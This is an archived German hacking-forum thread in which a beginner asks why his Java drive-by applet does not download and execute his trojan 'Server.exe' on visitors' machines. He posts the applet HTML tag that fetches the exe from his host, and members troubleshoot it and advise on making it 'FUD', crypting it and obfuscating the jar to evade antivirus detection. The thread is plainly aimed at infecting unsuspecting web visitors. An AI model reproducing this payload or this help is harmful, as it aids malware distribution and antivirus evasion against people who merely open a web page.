PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Java Driveby


Sunshen
02.01.12, 23:28
Hallo,
ich bin noch ein ziemlicher Anfänger, aber ich bin motiviert zu lernen.
Ich habe jetzt verschieden Apletts ausprobiert und bei keinem wurde meine Server.exe ausgeführt. Ich habe diese auch durch ein Programm ausgetauscht, wie z.B. die Hashcalc.exe, aber nichts ist passiert.
Meine html Seite wird aufgerufen, ich werde vom Aplett nach Bestätigung gefragt, ob diese URL vertrauenswürdig ist, aber die .exe wird ignoriert.
Natürlich habe ich die Index.html editiert und dort die Server-URL eingetragen.
Ich beschäftige mich jetzt sehr lange mit diesem Thema und ich weiß nicht mehr weiter, vielleicht kann mir hier jemand helfen!

sup3ria
02.01.12, 23:34
Der Benutzer wird auf jedel Fall ,bei der beschriebenen Methode , durch ein Warnhinweiß gewarnt das er eine .exe ausführt.

Es gibt auch Methoden dies zu umgehen aber entweder muss man schon enormen skill haben oder recht viel Geld ausgeben.

mAdDiN
02.01.12, 23:45
[Link nur für registrierte und freigeschaltete Mitglieder sichtbar] sowas meinste?!

kannst dir ja mal [Link nur für registrierte und freigeschaltete Mitglieder sichtbar] das

oder [Link nur für registrierte und freigeschaltete Mitglieder sichtbar] das anschauen :)

Liebe Grüße

d3mux
02.01.12, 23:55
Wie sieht deine index.html denn aus?
Wie lautet die URL zu deiner exe?

Dass deine exe nicht geladen wird kann an vielem liegen, zb. falsche URL (direkter Link zur exe?), falsche Zugriffsrechte eventuell oder fehlerhaftes Java Applet.
Welchen Drive By benutzt du denn?
Versuch doch mal die .jar datei zu entpacken und dekompilieren.

Sunshen
03.01.12, 22:38
Erstmal danke das du dir Zeit dafür nimmst.
Ich habe mir von verschiedenen Foren Komplett-Anleitungen durchgelesen und es genau so auch gemacht. Da waren auch immer fertige .jar Dateien dabei.
Ich hab schon darauf geachtet das dies auch relativ vertrauenswürdige Quellen waren, also jetzt nicht youtube oder so.
Die .jar Dateien hab ich mir nicht genauer angeschaut, da dafür auch kein Grund angegeben war. Diese Anleitungen gibt es ja überall.
Ich habe mir irgendeine Internet-Seite ausgeguckt und die denn gespeichert.
Dann habe ich die Index.html folgend editiert, der Code war in der Anleitung dabei:

<applet name='Please Run To Continue width='1' height='1' code='taipans.class' archive='finall.jar'><param name="funtime" value="[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]******.sa.ohost.de/hashcalc.exe"></applet>

Hier habe ich schon die Url zu meinem Testprogramm eingefügt, habe das aber auch schon mit einer echten Server Datei probiert.
Die URL zu meiner Test-Seite ist:

[Link nur für registrierte und freigeschaltete Mitglieder sichtbar]

Dort sind auch all meine Dateien sichtbar, man kann sich dort auch den Quelltext anschauen.
Vielleicht ist es beim Java-Driveby ja genauso wie mit den Cryptern. Das Freeware einfach scheiße ist. Das crypten überlasse ich jetzt auch jemanden Anderes.
Außerdem sollte der Driveby auch FUD sein oder kann man man bestimmte Dateien genauso crypten wie eine Server Datei?

Ich habe mich mit diesem Thema eine längere Zeit ausseinander gesetzt, mit z.B. Google oder auch vielen Foren. Aber leider hats nicht funktioniert.

mAdDiN
03.01.12, 23:59
Moin,

erstmal brauchste nicht danke sagen sondern einfach den danke Button unten Links in jedem Post betätigen :P

Also es wär schon ziemlich sinnvoll deine Javadriveby Fud zu haben! Deswegen hab ich dir die zwei Links zu hackforums.net geschickt. Ich wüsste nicht (wenn jemand es genau wissen sollte bitte mich korrigieren) das du die *.jar crypten könntest!

Der dritte Link zu dem Tool solltest du dazu nutzen den generierten Code vielleicht mit deinem zu vergleichen ;)

Liebe Grüße

Kataklysmos
04.01.12, 14:39
Also es wär schon ziemlich sinnvoll deine Javadriveby Fud zu haben! Deswegen hab ich dir die zwei Links zu hackforums.net geschickt. Ich wüsste nicht (wenn jemand es genau wissen sollte bitte mich korrigieren) das du die *.jar crypten könntest!

Eine Java- Datei zu "crypten" sehe ich als ein wenig überflüssig an. Die meisten Java- DriveBys sind weder obfuscated noch sonst etwas und lassen sich dementsprechend sehr einfach decompilen. Falls man jedoch keine Lust hat das Teil zu zerpflücken, kann man es auch einfach obfuscaten, dies hat jedenfalls früher immer wunderbar funktioniert.


Kataklysmos

bbking
10.01.12, 07:21
Ich wollte auch mal ne Java driveby ausführen
und bei der Compilierung in Eclipse lief alles wunderbärchen,
dann aber beim Test unter realen Bedingungen wollte nichts funktionieren :(

mfg,
bbking